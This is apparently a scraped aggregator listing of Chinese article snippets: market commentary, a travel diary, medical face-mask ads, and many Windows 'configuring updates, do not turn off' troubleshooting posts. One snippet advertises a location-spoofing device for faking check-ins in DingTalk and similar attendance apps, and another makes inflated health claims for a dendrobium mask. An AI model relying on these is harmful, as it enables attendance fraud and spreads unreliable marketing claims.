    原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...

    2024/5/4 23:54:56
  16. 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势

    原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...

    2024/5/4 23:55:17
  17. 氧生福地 玩美北湖(上)——为时光守候两千年

    原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...

    2024/5/4 23:55:06
  18. 氧生福地 玩美北湖(中)——永春梯田里的美与鲜

    原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...

    2024/5/4 23:54:56
  19. 氧生福地 玩美北湖(下)——奔跑吧骚年!

    原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...

    2024/5/4 23:55:06
  20. 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!

    原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...

    2024/5/5 8:13:33
  21. 「发现」铁皮石斛仙草之神奇功效用于医用面膜

    原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...

    2024/5/4 23:55:16
  22. 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者

    原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...

    2024/5/4 23:54:58
  23. 广州械字号面膜生产厂家OEM/ODM4项须知!

    原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...

    2024/5/4 23:55:01
  24. 械字号医用眼膜缓解用眼过度到底有无作用?

    原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...

    2024/5/4 23:54:56
  25. 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...

    解析如下:1、长按电脑电源键直至关机,然后再按一次电源健重启电脑,按F8健进入安全模式2、安全模式下进入Windows系统桌面后,按住“winR”打开运行窗口,输入“services.msc”打开服务设置3、在服务界面,选中…...

    2022/11/19 21:17:18
  26. 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。

    %读入6幅图像(每一幅图像的大小是564*564) f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...

    2022/11/19 21:17:16
  27. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...

    win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面,在等待界面中我们需要等待操作结束才能关机,虽然这比较麻烦,但是对系统进行配置和升级…...

    2022/11/19 21:17:15
  28. 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...

    有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows,请勿关闭计算机”的提示,要过很久才能进入系统,有的用户甚至几个小时也无法进入,下面就教大家这个问题的解决方法。第一种方法:我们首先在左下角的“开始…...

    2022/11/19 21:17:14
  29. win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...

    置信有很多用户都跟小编一样遇到过这样的问题,电脑时发现开机屏幕显现“正在配置Windows Update,请勿关机”(如下图所示),而且还需求等大约5分钟才干进入系统。这是怎样回事呢?一切都是正常操作的,为什么开时机呈现“正…...

    2022/11/19 21:17:13
  30. 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...

    Win7系统开机启动时总是出现“配置Windows请勿关机”的提示,没过几秒后电脑自动重启,每次开机都这样无法进入系统,此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一:开机按下F8,在出现的Windows高级启动选…...

    2022/11/19 21:17:12
  31. 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...

    有不少windows10系统用户反映说碰到这样一个情况,就是电脑提示正在准备windows请勿关闭计算机,碰到这样的问题该怎么解决呢,现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法:1、2、依次…...

    2022/11/19 21:17:11
  32. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...

    今天和大家分享一下win7系统重装了Win7旗舰版系统后,每次关机的时候桌面上都会显示一个“配置Windows Update的界面,提示请勿关闭计算机”,每次停留好几分钟才能正常关机,导致什么情况引起的呢?出现配置Windows Update…...

    2022/11/19 21:17:10
  33. 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...

    只能是等着,别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚,只能是考虑备份数据后重装系统了。解决来方案一:管理员运行cmd:net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...

    2022/11/19 21:17:09
  34. 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?

    原标题:电脑提示“配置Windows Update请勿关闭计算机”怎么办?win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢?一般的方…...

    2022/11/19 21:17:08
  35. 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...

    关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!关机提示 windows7 正在配…...

    2022/11/19 21:17:05
  36. 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...

    钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...

    2022/11/19 21:17:05
  37. 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...

    前几天班里有位学生电脑(windows 7系统)出问题了,具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面,长时间没反应,无法进入系统。这个问题原来帮其他同学也解决过,网上搜了不少资料&#x…...

    2022/11/19 21:17:04
  38. 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...

    本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法,并在最后教给你1种保护系统安全的好方法,一起来看看!电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中,添加了1个新功能在“磁…...

    2022/11/19 21:17:03
  39. 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...

    许多用户在长期不使用电脑的时候,开启电脑发现电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机。。.这要怎么办呢?下面小编就带着大家一起看看吧!如果能够正常进入系统,建议您暂时移…...

    2022/11/19 21:17:02
  40. 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...

    配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!配置windows update失败 还原更改 请勿关闭计算机&#x…...

    2022/11/19 21:17:01
  41. 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...

    不知道大家有没有遇到过这样的一个问题,就是我们的win7系统在关机的时候,总是喜欢显示“准备配置windows,请勿关机”这样的一个页面,没有什么大碍,但是如果一直等着的话就要两个小时甚至更久都关不了机,非常…...

    2022/11/19 21:17:00
  42. 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...

    当电脑出现正在准备配置windows请勿关闭计算机时,一般是您正对windows进行升级,但是这个要是长时间没有反应,我们不能再傻等下去了。可能是电脑出了别的问题了,来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...

    2022/11/19 21:16:59
  43. 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...

    我们使用电脑的过程中有时会遇到这种情况,当我们打开电脑之后,发现一直停留在一个界面:“配置Windows Update失败,还原更改请勿关闭计算机”,等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢&#xff0…...

    2022/11/19 21:16:58
  44. 如何在iPhone上关闭“请勿打扰”

    Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...

    2022/11/19 21:16:57